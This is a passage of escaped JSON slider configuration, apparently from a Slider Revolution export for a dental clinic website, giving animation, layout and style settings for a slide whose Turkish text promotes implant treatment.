bottom\",\"kb_duration\":\"6000\",\"kb_easing\":\"Power0.easeIn\",\"rs-gallery-type\":\"gallery\",\"bg_external\":\"\",\"bg_color\":\"#E7E7E7\",\"slide_bg_youtube\":\"\",\"slide_bg_vimeo\":\"\",\"slide_bg_html_mpeg\":\"\",\"slide_bg_html_webm\":\"\",\"slide_bg_html_ogv\":\"\",\"image_source_type\":\"full\",\"alt_option\":\"media_library\",\"alt_attr\":\"\",\"ext_width\":\"1920\",\"ext_height\":\"1080\",\"video_force_cover\":\"on\",\"video_dotted_overlay\":\"none\",\"video_ratio\":\"16:9\",\"video_start_at\":\"\",\"video_end_at\":\"\",\"video_loop\":\"none\",\"video_nextslide\":\"off\",\"video_force_rewind\":\"on\",\"video_mute\":\"on\",\"video_volume\":\"\",\"video_speed\":\"1\",\"video_arguments\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"video_arguments_vim\":\"title=0&byline=0&portrait=0&api=1\",\"kb_start_offset_x\":\"0\",\"kb_end_offset_x\":\"0\",\"kb_start_offset_y\":\"0\",\"kb_end_offset_y\":\"0\",\"kb_start_rotate\":\"0\",\"kb_end_rotate\":\"0\",\"hideslideafter\":\"0\",\"save_performance\":\"off\",\"thumb_dimension\":\"slider\",\"thumb_for_admin\":\"off\",\"transition_ease_in\":[\"default\"],\"transition_ease_out\":[\"default\"],\"params_1\":\"\",\"params_1_chars\":\"10\",\"params_2\":\"\",\"params_2_chars\":\"10\",\"params_3\":\"\",\"params_3_chars\":\"10\",\"params_4\":\"\",\"params_4_chars\":\"10\",\"params_5\":\"\",\"params_5_chars\":\"10\",\"params_6\":\"\",\"params_6_chars\":\"10\",\"params_7\":\"\",\"params_7_chars\":\"10\",\"params_8\":\"\",\"params_8_chars\":\"10\",\"params_9\":\"\",\"params_9_chars\":\"10\",\"params_10\":\"\",\"params_10_chars\":\"10\",\"slide_description\":\"\",\"class_attr\":\"\",\"id_attr\":\"\",\"data_attr\":\"\",\"title_option\":\"media_library\",\"title_attr\":\"\",\"media-filter-type\":\"none\",\"stoponpurpose\":\"false\",\"invisibleslide\":\"false\",\"hideslideonmobile\":\"off\",\"ph-round-tabs-font-family-font_family-slide\":\"off\",\"ph-round-tabs-font-family-font_family\":\"Roboto\",\"ph-round-tabs-border-color-color-rgba-slide\":\"off\",\"ph-round-tabs-border-color-color-rgba\":\"#e5e5e5\",\"ph-round-tabs-border-size-custom-slide\":\"off\",\"ph-round-tabs-border-size-custom\":\"1\",\"ph-round-tabs-image-size-custom-slide\":\"off\",\"ph-round-tabs-image-size-custom\":\"60\",\"ph-round-tabs-param1-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param1-color-color-rgba\":\"rgba(51,51,51,0.5)\",\"ph-round-tabs-param1-size-custom-slide\":\"off\",\"ph-round-tabs-param1-size-custom\":\"12\",\"ph-round-tabs-hover-bg-color-color-rgba-slide\":\"off\",\"ph-round-tabs-hover-bg-color-color-rgba\":\"#eeeeee\",\"ph-round-tabs-bgcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-bgcolor-color-rgba\":\"rgba(0,0,0,0)\",\"ph-round-tabs-contentcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-contentcolor-color-rgba\":\"#333333\",\"ph-round-tabs-param2-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param2-color-color-rgba\":\"transparent\",\"ph-round-tabs-param2-size-custom-slide\":\"off\",\"ph-round-tabs-param2-size-custom\":\"14\",\"ph-round-thumbs-title-bg-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-bg-color-rgba\":\"rgba(0,0,0,0.85)\",\"ph-round-thumbs-title-color-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-color-color-rgba\":\"#ffffff\",\"ph-round-thumbs-title-font-size-custom-slide\":\"off\",\"ph-round-thumbs-title-font-size-custom\":\"12\",\"slide_parallax_level\":\"4\",\"kb_blur_start\":\"0\",\"kb_blur_end\":\"0\",\"image_id\":\"6433\",\"0\":\"Remove\"}', '[{\"static_styles\":{\"font-size\":{\"desktop\":\"\"},\"line-height\":{\"desktop\":\"\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"\"},\"letter-spacing\":{\"desktop\":\"\"}},\"deformation\":{\"background-color\":\"rgba(0,0,0,0.5)\",\"border-color\":\"rgba(0,0,0,0.5)\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-style\":\"solid\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"font-style\":\"normal\",\"text-decoration\":\"none\",\"vertical-align\":\"top\",\"text-transform\":\"none\",\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"overflow\":\"visible\",\"font-family\":\"\"},\"deformation-hover\":{\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"pointer_events\":\"auto\"},\"text\":\" \",\"alias\":\"Shape\",\"type\":\"shape\",\"style\":\"\",\"internal_class\":\"tp-shape tp-shapewrapper\",\"autolinebreak\":false,\"max_width\":{\"desktop\":\"538px\"},\"max_height\":{\"desktop\":\"501px\"},\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":10,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"tp-fade\",\"easing\":\"Power3.easeInOut\",\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"time_relative\":10,\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"\",\"easing\":\"Power3.easeInOut\",\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"time_relative\":4560,\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":{},\"unique_id\":6,\"left\":{\"desktop\":4},\"top\":{\"desktop\":0},\"isDemo\":false,\"hover\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"min_height\":\"40px\",\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_follow\":\"follow\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":200,\"height\":500,\"cover_mode\":\"custom\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"inherit\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":0,\"endWithSlide\":false,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\"},\"scaleY\":{\"desktop\":\"\"},\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrTabindex\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"p_uid\":-1,\"zIndex\":5,\"positionLeftReset\":1,\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"addedToStage\":true,\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"\\u0130mplant Tedavisi\",\"type\":\"text\",\"left\":{\"desktop\":17,\"notebook\":20},\"top\":{\"desktop\":125,\"notebook\":106},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":497,\"height\":60,\"serial\":1,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"700\",\"notebook\":\"700\"},\"font-size\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"line-height\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Limitless\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":2,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":600,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3870,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"center\",\"notebook\":\"center\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":6,\"positionLeftReset\":70,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]}},{\"text\":\"\\u0130mplant operasyonu, dokular \\u00fczerinde <br> basit bir di\\u015f \\u00e7ekimi ile hemen hemen <br>ayn\\u0131 etkiye sahiptir.  \",\"type\":\"text\",\"left\":{\"desktop\":19,\"notebook\":22},\"top\":{\"desktop\":198,\"notebook\":190},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":434,\"height\":84,\"serial\":2,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"300\",\"notebook\":\"300\"},\"font-size\":{\"desktop\":\"25px\",\"notebook\":\"25px\"},\"line-height\":{\"desktop\":\"25px\",\"notebook\":\"28px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Exceptional\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":1,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":800,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":800,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3670,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"s